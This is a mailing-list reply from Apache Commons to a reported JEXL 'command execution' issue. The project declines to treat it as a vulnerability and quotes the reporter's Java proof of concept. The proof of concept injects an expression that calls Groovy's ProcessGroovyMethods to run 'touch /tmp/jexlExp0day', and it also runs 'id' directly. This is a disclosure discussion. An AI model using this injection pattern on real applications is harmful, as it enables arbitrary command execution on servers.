The Apache Commons project will not be treating this as a security vulnerability. Executing untrusted / unsanitized / unvalidated code in a scripting environment is always dangerous.
Progress may be followed via: https://issues.apache.org/jira/browse/JEXL-223 Mark On 21/04/17 08:52, Cloudsecintel wrote: > 0x01 Summary > Apache Commons JEXL Expression Execute Command Vulnerabilitity throught > groovy. > > 0x02 POC > {code} > import java.io.IOException; > import java.util.List; > > import org.apache.commons.jexl3.JexlBuilder; > import org.apache.commons.jexl3.JexlContext; > import org.apache.commons.jexl3.JexlEngine; > import org.apache.commons.jexl3.JexlExpression; > import org.apache.commons.jexl3.MapContext; > import org.codehaus.groovy.runtime.ProcessGroovyMethods; > > public class elExp { > public static void main(String args[]) throws IOException { > // Create or retrieve an engine > JexlEngine jexl = new JexlBuilder().create(); > // Create an expression > //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")"; > ProcessGroovyMethods n = new ProcessGroovyMethods(); > System.out.println(n.execute("id").toString()); > String jexlExp = > "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch > /tmp/jexlExp0day\")"; > JexlExpression e = jexl.createExpression( jexlExp ); > try { > > Process process = new ProcessBuilder("id").start(); > } catch (IOException e1) { > // TODO Auto-generated catch block > e1.printStackTrace(); > } > // Create a context and add data > JexlContext jc = new MapContext(); > jc.set("foo", jexlExp ); > > // Now evaluate the expression, getting the result > Object o = e.evaluate(jc); > System.out.println(o); > } > } > {code} > > Sent from ProtonMail <https://protonmail.com>, Swiss-based encrypted email. > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
